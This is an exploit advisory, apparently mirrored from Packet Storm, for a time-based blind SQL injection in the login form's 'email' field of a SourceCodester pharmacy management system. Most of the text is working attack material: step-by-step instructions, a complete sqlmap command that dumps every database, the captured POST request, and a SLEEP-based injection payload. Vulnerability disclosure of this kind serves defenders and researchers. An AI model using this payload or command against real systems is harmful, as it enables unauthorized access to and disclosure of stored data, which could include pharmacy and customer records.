Share
## https://sploitus.com/exploit?id=PACKETSTORM:166787
# Exploit Title: Pharmacy management system - 'email' SQL injection  
# Date: 19/04/2022  
# Exploit Author: Saud Alenazi  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/15281/multi-language-pharmacy-management-system-project-source-code.html  
# Version: 1.0  
# Tested on: XAMPP, Linux  
# Contact: https://twitter.com/dmaral3noz  
  
Step 1. Capture the request of the "http://127.0.0.1/dawapharma/login.php"  
page in burpsute  
Step 2. Save POST the packet  
Step 3. Run sqlmap on request file using command "python3 sqlmap.py -r  
request.txt -p email --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast --dbs"  
Step 4. This will inject successfully and you will have an information  
disclosure of all databases contents  
  
POST the packet  
  
POST /dawapharma/dawapharma/login.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 62  
Connection: close  
Cookie: PHPSESSID=d2hvmuiicg9o9jl78hc2mkneel  
Upgrade-Insecure-Requests: 1  
  
email=HI%40HI.COM&password=TEST&login=  
  
---  
  
Parameter: email (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: email=HI@HI.COM' AND (SELECT 1029 FROM (SELECT(SLEEP(5)))FNdi) AND 'QxLg'='QxLg&password=TEST&login=  
---